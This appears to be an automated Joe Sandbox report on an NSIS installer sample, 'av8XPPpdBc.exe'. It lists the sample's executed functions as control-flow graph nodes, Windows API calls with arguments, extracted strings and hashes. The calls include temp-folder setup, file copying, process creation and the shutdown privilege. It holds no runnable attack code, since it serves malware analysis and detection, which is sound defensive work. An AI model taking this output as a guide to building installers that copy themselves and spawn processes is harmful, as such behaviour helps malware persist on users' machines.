3447 40303f 3445->3447 3448 403030 DestroyWindow 3446->3448 3449 403037 3446->3449 3450 403047 3447->3450 3451 40304f GetTickCount 3447->3451 3448->3449 3449->3350 3454 406987 2 API calls 3450->3454 3452 403080 3451->3452 3453 40305d CreateDialogParamW ShowWindow 3451->3453 3452->3350 3453->3452 3455 40304d 3454->3455 3455->3350 3456->3358 3459 4032d2 3457->3459 3458 403300 3461 4034d4 ReadFile 3458->3461 3459->3458 3481 4034ea SetFilePointer 3459->3481 3462 40330b 3461->3462 3463 40346d 3462->3463 3464 40331d GetTickCount 3462->3464 3466 403253 3462->3466 3465 4034af 3463->3465 3470 403471 3463->3470 3464->3466 3473 40336c 3464->3473 3468 4034d4 ReadFile 3465->3468 3466->3362 3466->3366 3467 4034d4 ReadFile 3467->3473 3468->3466 3469 4034d4 ReadFile 3469->3470 3470->3466 3470->3469 3471 4060f9 WriteFile 3470->3471 3471->3470 3472 4033c2 GetTickCount 3472->3473 3473->3466 3473->3467 3473->3472 3474 4033e7 MulDiv wsprintfW 3473->3474 3476 4060f9 WriteFile 3473->3476 3475 4055dc 28 API calls 3474->3475 3475->3473 3476->3473 3478 4060ca ReadFile 3477->3478 3479 4034e7 3478->3479 3479->3352 3480->3357 3481->3458 3483 403f13 3482->3483 3499 40649e wsprintfW 3483->3499 3485 403f84 3500 403fb8 3485->3500 3487 403cb4 3487->3380 3488 403f89 3488->3487 3489 406594 21 API calls 3488->3489 3489->3488 3503 404522 3490->3503 3492 4056f9 3493 404522 SendMessageW 3492->3493 3495 40570b CoUninitialize 3493->3495 3494 4056d2 3494->3492 3506 401389 3494->3506 3495->3411 3497->3376 3498->3382 3499->3485 3501 406594 21 API calls 3500->3501 3502 403fc6 SetWindowTextW 3501->3502 3502->3488 3504 40453a 3503->3504 3505 40452b SendMessageW 3503->3505 3504->3494 3505->3504 3508 401390 3506->3508 3507 4013fe 3507->3494 3508->3507 3509 4013cb MulDiv SendMessageW 3508->3509 3509->3508 3511 403ba2 3510->3511 3512 403b6c 3511->3512 3513 403ba7 FreeLibrary GlobalFree 3511->3513 3512->3433 3513->3512 3513->3513 4407 401a35 4408 402dab 21 API calls 4407->4408 4409 401a3e ExpandEnvironmentStringsW 4408->4409 4410 401a52 4409->4410 4412 401a65 4409->4412 4411 401a57 lstrcmpW 4410->4411 4410->4412 4411->4412 4418 4023b7 4419 4023bf 4418->4419 4422 4023c5 4418->4422 4420 402dab 21 API calls 4419->4420 4420->4422 4421 4023d3 4424 4023e1 4421->4424 4425 402dab 21 API calls 4421->4425 4422->4421 4423 402dab 21 API calls 4422->4423 4423->4421 4426 402dab 21 API calls 4424->4426 4425->4424 4427 4023ea WritePrivateProfileStringW 4426->4427 4428 4014b8 4429 4014be 4428->4429 4430 401389 2 API calls 4429->4430 4431 4014c6 4430->4431 4432 402439 4433 402441 4432->4433 4434 40246c 4432->4434 4435 402deb 21 API calls 4433->4435 4436 402dab 21 API calls 4434->4436 4437 402448 4435->4437 4438 402473 4436->4438 4440 402dab 21 API calls 4437->4440 4441 402480 4437->4441 4443 402e69 4438->4443 4442 402459 RegDeleteValueW RegCloseKey 4440->4442 4442->4441 4444 402e76 4443->4444 4445 402e7d 4443->4445 4444->4441 4445->4444 4447 402eae 4445->4447 4448 4063c4 RegOpenKeyExW 4447->4448 4449 402edc 4448->4449 4450 402eec RegEnumValueW 4449->4450 4455 402f0f 4449->4455 4458 402f86 4449->4458 4451 402f76 RegCloseKey 4450->4451 4450->4455 4451->4458 4452 402f4b RegEnumKeyW 4453 402f54 RegCloseKey 4452->4453 4452->4455 4454 40694b 5 API calls 4453->4454 4456 402f64 4454->4456 4455->4451 4455->4452 4455->4453 4457 402eae 6 API calls 4455->4457 4456->4458 4459 402f68 RegDeleteKeyW 4456->4459 4457->4455 4458->4444 4459->4458 4460 40173a 4461 402dab 21 API calls 4460->4461 4462 401741 SearchPathW 4461->4462 4463 40175c 4462->4463 4464 401d3d 4465 402d89 21 API calls 4464->4465 4466 401d44 4465->4466 4467 402d89 21 API calls 4466->4467 4468 401d50 GetDlgItem 4467->4468 4469 40263d 4468->4469 4469->4469

                                                                                                                                                                                      Executed Functions

                                                                                                                                                                                      Function 00403532 Relevance: 86.2, APIs: 32, Strings: 17, Instructions: 464stringfilecomCOMMON
                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                      • Executed
                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                      control_flow_graph 0 403532-403584 SetErrorMode GetVersionExW 1 403586-4035b6 GetVersionExW 0->1 2 4035be-4035c3 0->2 1->2 3 4035c5 2->3 4 4035cb-40360d 2->4 3->4 5 403620 4->5 6 40360f-403617 call 40694b 4->6 7 403625-403639 call 4068db lstrlenA 5->7 6->5 12 403619 6->12 13 40363b-403657 call 40694b * 3 7->13 12->5 20 403668-4036cc #17 OleInitialize SHGetFileInfoW call 406557 GetCommandLineW call 406557 13->20 21 403659-40365f 13->21 28 4036d5-4036e9 call 405e53 CharNextW 20->28 29 4036ce-4036d0 20->29 21->20 26 403661 21->26 26->20 32 4037e4-4037ea 28->32 29->28 33 4037f0 32->33 34 4036ee-4036f4 32->34 37 403804-40381e GetTempPathW call 403501 33->37 35 4036f6-4036fb 34->35 36 4036fd-403704 34->36 35->35 35->36 39 403706-40370b 36->39 40 40370c-403710 36->40 44 403820-40383e GetWindowsDirectoryW lstrcatW call 403501 37->44 45 403876-403890 DeleteFileW call 403082 37->45 39->40 42 4037d1-4037e0 call 405e53 40->42 43 403716-40371c 40->43 42->32 61 4037e2-4037e3 42->61 47 403736-40376f 43->47 48 40371e-403725 43->48 44->45 64 403840-403870 GetTempPathW lstrcatW SetEnvironmentVariableW * 2 call 403501 44->64 66 403896-40389c 45->66 67 403a7d-403a8d call 403b4f OleUninitialize 45->67 49 403771-403776 47->49 50 40378c-4037c6 47->50 54 403727-40372a 48->54 55 40372c 48->55 49->50 56 403778-403780 49->56 58 4037c8-4037cc 50->58 59 4037ce-4037d0 50->59 54->47 54->55 55->47 62 403782-403785 56->62 63 403787 56->63 58->59 65 4037f2-4037ff call 406557 58->65 59->42 61->32 62->50 62->63 63->50 64->45 64->67 65->37 70 4038a2-4038ad call 405e53 66->70 71 403935-40393c call 403c29 66->71 78 403ab3-403ab9 67->78 79 403a8f-403a9f call 405bb7 ExitProcess 67->79 81 4038fb-403905 70->81 82 4038af-4038e4 70->82 77 403941-403945 71->77 77->67 83 403b37-403b3f 78->83 84 403abb-403ad1 GetCurrentProcess OpenProcessToken 78->84 89 403907-403915 call 405f2e 81->89 90 40394a-403970 call 405b22 lstrlenW call 406557 81->90 86 4038e6-4038ea 82->86 91 403b41 83->91 92 403b45-403b49 ExitProcess 83->92 87 403ad3-403b01 LookupPrivilegeValueW AdjustTokenPrivileges 84->87 88 403b07-403b15 call 40694b 84->88 94 4038f3-4038f7 86->94 95 4038ec-4038f1 86->95 87->88 104 403b23-403b2e ExitWindowsEx 88->104 105 403b17-403b21 88->105 89->67 106 40391b-403931 call 406557 * 2 89->106 110 403981-403999 90->110 111 403972-40397c call 406557 90->111 91->92 94->86 99 4038f9 94->99 95->94 95->99 99->81 104->83 108 403b30-403b32 call 40140b 104->108 105->104 105->108 106->71 108->83 116 40399e-4039a2 110->116 111->110 118 4039a7-4039d1 wsprintfW call 406594 116->118 122 4039d3-4039d8 call 405aab 118->122 123 4039da call 405b05 118->123 126 4039df-4039e1 122->126 123->126 128 4039e3-4039ed GetFileAttributesW 126->128 129 403a1d-403a3c SetCurrentDirectoryW call 406317 CopyFileW 126->129 130 403a0e-403a19 128->130 131 4039ef-4039f8 DeleteFileW 128->131 137 403a7b 129->137 138 403a3e-403a5f call 406317 call 406594 call 405b3a 129->138 130->116 134 403a1b 130->134 131->130 133 4039fa-403a0c call 405c63 131->133 133->118 133->130 134->67 137->67 146 403a61-403a6b 138->146 147 403aa5-403ab1 CloseHandle 138->147 146->137 148 403a6d-403a75 call 4068b4 146->148 147->137 148->118 148->137
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • SetErrorMode.KERNELBASE ref: 00403555
                                                                                                                                                                                      • GetVersionExW.KERNEL32(?,?,?,?,?,?,?,?), ref: 00403580
                                                                                                                                                                                      • GetVersionExW.KERNEL32(?,?,?,?,?,?,?,?,?), ref: 00403593
                                                                                                                                                                                      • lstrlenA.KERNEL32(UXTHEME,UXTHEME,?,?,?,?,?,?,?,?), ref: 0040362C
                                                                                                                                                                                      • #17.COMCTL32(?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403669
                                                                                                                                                                                      • OleInitialize.OLE32(00000000), ref: 00403670
                                                                                                                                                                                      • SHGetFileInfoW.SHELL32(0042AA28,00000000,?,000002B4,00000000), ref: 0040368F
                                                                                                                                                                                      • GetCommandLineW.KERNEL32(00433700,NSIS Error,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 004036A4
                                                                                                                                                                                      • CharNextW.USER32(00000000,"C:\Users\user\Desktop\av8XPPpdBc.exe",00000020,"C:\Users\user\Desktop\av8XPPpdBc.exe",00000000,?,00000008,0000000A,0000000C), ref: 004036DD
                                                                                                                                                                                      • GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,00000000,00008001,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403815
                                                                                                                                                                                      • GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403826
                                                                                                                                                                                      • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403832
                                                                                                                                                                                      • GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403846
                                                                                                                                                                                      • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 0040384E
                                                                                                                                                                                      • SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 0040385F
                                                                                                                                                                                      • SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403867
                                                                                                                                                                                      • DeleteFileW.KERNELBASE(1033,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 0040387B
                                                                                                                                                                                      • lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\av8XPPpdBc.exe",00000000,?,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403954
                                                                                                                                                                                        • Part of subcall function 00406557: lstrcpynW.KERNEL32(?,?,00000400,004036A4,00433700,NSIS Error,?,00000008,0000000A,0000000C), ref: 00406564
                                                                                                                                                                                      • wsprintfW.USER32 ref: 004039B1
                                                                                                                                                                                      • GetFileAttributesW.KERNEL32( Hype,e",C:\Users\user\AppData\Local\Temp\), ref: 004039E4
                                                                                                                                                                                      • DeleteFileW.KERNEL32( Hype,e"), ref: 004039F0
                                                                                                                                                                                      • SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\), ref: 00403A1E
                                                                                                                                                                                        • Part of subcall function 00406317: MoveFileExW.KERNEL32(?,?,00000005,00405E15,?,00000000,000000F1,?,?,?,?,?), ref: 00406321
                                                                                                                                                                                      • CopyFileW.KERNEL32(C:\Users\user\Desktop\av8XPPpdBc.exe, Hype,e",00000001,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00403A34
                                                                                                                                                                                        • Part of subcall function 00405B3A: CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,0042FA70,?,?,?, Hype,e",?), ref: 00405B63
                                                                                                                                                                                        • Part of subcall function 00405B3A: CloseHandle.KERNEL32(?,?,?, Hype,e",?), ref: 00405B70
                                                                                                                                                                                        • Part of subcall function 004068B4: FindFirstFileW.KERNELBASE(?,0042FAB8,C:\Users\user\AppData\Local\Temp\nswE27F.tmp,00405F77,C:\Users\user\AppData\Local\Temp\nswE27F.tmp,C:\Users\user\AppData\Local\Temp\nswE27F.tmp,00000000,C:\Users\user\AppData\Local\Temp\nswE27F.tmp,C:\Users\user\AppData\Local\Temp\nswE27F.tmp, 4#v,?,C:\Users\user\AppData\Local\Temp\,00405C83,?,76233420,C:\Users\user\AppData\Local\Temp\), ref: 004068BF
                                                                                                                                                                                        • Part of subcall function 004068B4: FindClose.KERNEL32(00000000), ref: 004068CB
                                                                                                                                                                                      • OleUninitialize.OLE32(?,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403A82
                                                                                                                                                                                      • ExitProcess.KERNEL32 ref: 00403A9F
                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000,00438000,00438000,?, Hype,e",00000000), ref: 00403AA6
                                                                                                                                                                                      • GetCurrentProcess.KERNEL32(00000028,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403AC2
                                                                                                                                                                                      • OpenProcessToken.ADVAPI32(00000000,?,?,?,?,?,?,?,?), ref: 00403AC9
                                                                                                                                                                                      • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403ADE
                                                                                                                                                                                      • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?), ref: 00403B01
                                                                                                                                                                                      • ExitWindowsEx.USER32(00000002,80040002), ref: 00403B26
                                                                                                                                                                                      • ExitProcess.KERNEL32 ref: 00403B49
                                                                                                                                                                                        • Part of subcall function 00405B05: CreateDirectoryW.KERNELBASE(?,00000000,00403525,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040381C,?,00000008,0000000A,0000000C), ref: 00405B0B
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.2182955052.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      • Associated: 00000000.00000002.2182934317.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2182971929.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183191947.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_av8XPPpdBc.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: File$Process$CloseDirectoryExit$CreateCurrentDeleteEnvironmentFindHandlePathTempTokenVariableVersionWindowslstrcatlstrlen$AdjustAttributesCharCommandCopyErrorFirstInfoInitializeLineLookupModeMoveNextOpenPrivilegePrivilegesUninitializeValuelstrcpynwsprintf
                                                                                                                                                                                      • String ID: Hype,e"$"C:\Users\user\Desktop\av8XPPpdBc.exe"$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\erstatningsgraden$C:\Users\user\AppData\Roaming\erstatningsgraden\Observatorers$C:\Users\user\Desktop$C:\Users\user\Desktop\av8XPPpdBc.exe$Error launching installer$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu%X.tmp
                                                                                                                                                                                      • API String ID: 1813718867-3873721440
                                                                                                                                                                                      • Opcode ID: 2f58fbcc075b23529aa9588561da4342b8d2734b046618fffc698aa71994b29c
                                                                                                                                                                                      • Instruction ID: 6c1349364f4d22fadfcc29bbd5f82b0434b4f5ba6e08f6571c64e8404a3f48da
                                                                                                                                                                                      • Opcode Fuzzy Hash: 2f58fbcc075b23529aa9588561da4342b8d2734b046618fffc698aa71994b29c
                                                                                                                                                                                      • Instruction Fuzzy Hash: 64F10270604301ABD320AF659D45B2B7AE8EF8570AF10483EF581B22D1DB7DDA45CB6E
                                                                                                                                                                                      Function 0040571B Relevance: 65.0, APIs: 36, Strings: 1, Instructions: 284windowclipboardmemoryCOMMON
                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                      • Executed
                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                      control_flow_graph 151 40571b-405736 152 4058c5-4058cc 151->152 153 40573c-405803 GetDlgItem * 3 call 40450b call 404e64 GetClientRect GetSystemMetrics SendMessageW * 2 151->153 155 4058f6-405903 152->155 156 4058ce-4058f0 GetDlgItem CreateThread CloseHandle 152->156 175 405821-405824 153->175 176 405805-40581f SendMessageW * 2 153->176 158 405921-40592b 155->158 159 405905-40590b 155->159 156->155 160 405981-405985 158->160 161 40592d-405933 158->161 163 405946-40594f call 40453d 159->163 164 40590d-40591c ShowWindow * 2 call 40450b 159->164 160->163 170 405987-40598d 160->170 166 405935-405941 call 4044af 161->166 167 40595b-40596b ShowWindow 161->167 172 405954-405958 163->172 164->158 166->163 173 40597b-40597c call 4044af 167->173 174 40596d-405976 call 4055dc 167->174 170->163 177 40598f-4059a2 SendMessageW 170->177 173->160 174->173 178 405834-40584b call 4044d6 175->178 179 405826-405832 SendMessageW 175->179 176->175 180 405aa4-405aa6 177->180 181 4059a8-4059d3 CreatePopupMenu call 406594 AppendMenuW 177->181 190 405881-4058a2 GetDlgItem SendMessageW 178->190 191 40584d-405861 ShowWindow 178->191 179->178 180->172 188 4059d5-4059e5 GetWindowRect 181->188 189 4059e8-4059fd TrackPopupMenu 181->189 188->189 189->180 192 405a03-405a1a 189->192 190->180 195 4058a8-4058c0 SendMessageW * 2 190->195 193 405870 191->193 194 405863-40586e ShowWindow 191->194 196 405a1f-405a3a SendMessageW 192->196 197 405876-40587c call 40450b 193->197 194->197 195->180 196->196 198 405a3c-405a5f OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 196->198 197->190 200 405a61-405a88 SendMessageW 198->200 200->200 201 405a8a-405a9e GlobalUnlock SetClipboardData CloseClipboard 200->201 201->180
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • GetDlgItem.USER32(?,00000403), ref: 00405779
                                                                                                                                                                                      • GetDlgItem.USER32(?,000003EE), ref: 00405788
                                                                                                                                                                                      • GetClientRect.USER32(?,?), ref: 004057C5
                                                                                                                                                                                      • GetSystemMetrics.USER32(00000002), ref: 004057CC
                                                                                                                                                                                      • SendMessageW.USER32(?,00001061,00000000,?), ref: 004057ED
                                                                                                                                                                                      • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004057FE
                                                                                                                                                                                      • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 00405811
                                                                                                                                                                                      • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 0040581F
                                                                                                                                                                                      • SendMessageW.USER32(?,00001024,00000000,?), ref: 00405832
                                                                                                                                                                                      • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 00405854
                                                                                                                                                                                      • ShowWindow.USER32(?,00000008), ref: 00405868
                                                                                                                                                                                      • GetDlgItem.USER32(?,000003EC), ref: 00405889
                                                                                                                                                                                      • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 00405899
                                                                                                                                                                                      • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 004058B2
                                                                                                                                                                                      • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 004058BE
                                                                                                                                                                                      • GetDlgItem.USER32(?,000003F8), ref: 00405797
                                                                                                                                                                                        • Part of subcall function 0040450B: SendMessageW.USER32(00000028,?,00000001,00404336), ref: 00404519
                                                                                                                                                                                      • GetDlgItem.USER32(?,000003EC), ref: 004058DB
                                                                                                                                                                                      • CreateThread.KERNELBASE(00000000,00000000,Function_000056AF,00000000), ref: 004058E9
                                                                                                                                                                                      • CloseHandle.KERNELBASE(00000000), ref: 004058F0
                                                                                                                                                                                      • ShowWindow.USER32(00000000), ref: 00405914
                                                                                                                                                                                      • ShowWindow.USER32(?,00000008), ref: 00405919
                                                                                                                                                                                      • ShowWindow.USER32(00000008), ref: 00405963
                                                                                                                                                                                      • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405997
                                                                                                                                                                                      • CreatePopupMenu.USER32 ref: 004059A8
                                                                                                                                                                                      • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 004059BC
                                                                                                                                                                                      • GetWindowRect.USER32(?,?), ref: 004059DC
                                                                                                                                                                                      • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004059F5
                                                                                                                                                                                      • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405A2D
                                                                                                                                                                                      • OpenClipboard.USER32(00000000), ref: 00405A3D
                                                                                                                                                                                      • EmptyClipboard.USER32 ref: 00405A43
                                                                                                                                                                                      • GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405A4F
                                                                                                                                                                                      • GlobalLock.KERNEL32(00000000), ref: 00405A59
                                                                                                                                                                                      • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405A6D
                                                                                                                                                                                      • GlobalUnlock.KERNEL32(00000000), ref: 00405A8D
                                                                                                                                                                                      • SetClipboardData.USER32(0000000D,00000000), ref: 00405A98
                                                                                                                                                                                      • CloseClipboard.USER32 ref: 00405A9E
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.2182955052.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      • Associated: 00000000.00000002.2182934317.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2182971929.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183191947.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_av8XPPpdBc.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                                                                                                                                                      • String ID: {
                                                                                                                                                                                      • API String ID: 590372296-366298937
                                                                                                                                                                                      • Opcode ID: 6951b3530aa72caf7521df0bf8db88f5d1408e2bb92485539c1303395de87c8c
                                                                                                                                                                                      • Instruction ID: 234ab3d0ec1f6487b719ed7b99e1d6b4405f443d9e8d78e252fa94ab3ac4d3a1
                                                                                                                                                                                      • Opcode Fuzzy Hash: 6951b3530aa72caf7521df0bf8db88f5d1408e2bb92485539c1303395de87c8c
                                                                                                                                                                                      • Instruction Fuzzy Hash: 34B139B1900608FFDB11AF60DD89AAE7B79FB48355F00813AFA41BA1A0C7785A51DF58
                                                                                                                                                                                      Function 00405C63 Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 148filestringCOMMON
                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                      • Executed
                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                      control_flow_graph 450 405c63-405c89 call 405f2e 453 405ca2-405ca9 450->453 454 405c8b-405c9d DeleteFileW 450->454 456 405cab-405cad 453->456 457 405cbc-405ccc call 406557 453->457 455 405e1f-405e23 454->455 458 405cb3-405cb6 456->458 459 405dcd-405dd2 456->459 463 405cdb-405cdc call 405e72 457->463 464 405cce-405cd9 lstrcatW 457->464 458->457 458->459 459->455 462 405dd4-405dd7 459->462 465 405de1-405de9 call 4068b4 462->465 466 405dd9-405ddf 462->466 467 405ce1-405ce5 463->467 464->467 465->455 473 405deb-405dff call 405e26 call 405c1b 465->473 466->455 470 405cf1-405cf7 lstrcatW 467->470 471 405ce7-405cef 467->471 474 405cfc-405d18 lstrlenW FindFirstFileW 470->474 471->470 471->474 490 405e01-405e04 473->490 491 405e17-405e1a call 4055dc 473->491 476 405dc2-405dc6 474->476 477 405d1e-405d26 474->477 476->459 481 405dc8 476->481 478 405d46-405d5a call 406557 477->478 479 405d28-405d30 477->479 492 405d71-405d7c call 405c1b 478->492 493 405d5c-405d64 478->493 482 405d32-405d3a 479->482 483 405da5-405db5 FindNextFileW 479->483 481->459 482->478 486 405d3c-405d44 482->486 483->477 489 405dbb-405dbc FindClose 483->489 486->478 486->483 489->476 490->466 494 405e06-405e15 call 4055dc call 406317 490->494 491->455 503 405d9d-405da0 call 4055dc 492->503 504 405d7e-405d81 492->504 493->483 495 405d66-405d6f call 405c63 493->495 494->455 495->483 503->483 507 405d83-405d93 call 4055dc call 406317 504->507 508 405d95-405d9b 504->508 507->483 508->483
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • DeleteFileW.KERNELBASE(?,?,76233420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\av8XPPpdBc.exe"), ref: 00405C8C
                                                                                                                                                                                      • lstrcatW.KERNEL32(0042EA70,\*.*,0042EA70,?,?,76233420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\av8XPPpdBc.exe"), ref: 00405CD4
                                                                                                                                                                                      • lstrcatW.KERNEL32(?,0040A014,?,0042EA70,?,?,76233420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\av8XPPpdBc.exe"), ref: 00405CF7
                                                                                                                                                                                      • lstrlenW.KERNEL32(?,?,0040A014,?,0042EA70,?,?,76233420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\av8XPPpdBc.exe"), ref: 00405CFD
                                                                                                                                                                                      • FindFirstFileW.KERNEL32(0042EA70,?,?,?,0040A014,?,0042EA70,?,?,76233420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\av8XPPpdBc.exe"), ref: 00405D0D
                                                                                                                                                                                      • FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405DAD
                                                                                                                                                                                      • FindClose.KERNEL32(00000000), ref: 00405DBC
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.2182955052.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      • Associated: 00000000.00000002.2182934317.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2182971929.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183191947.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
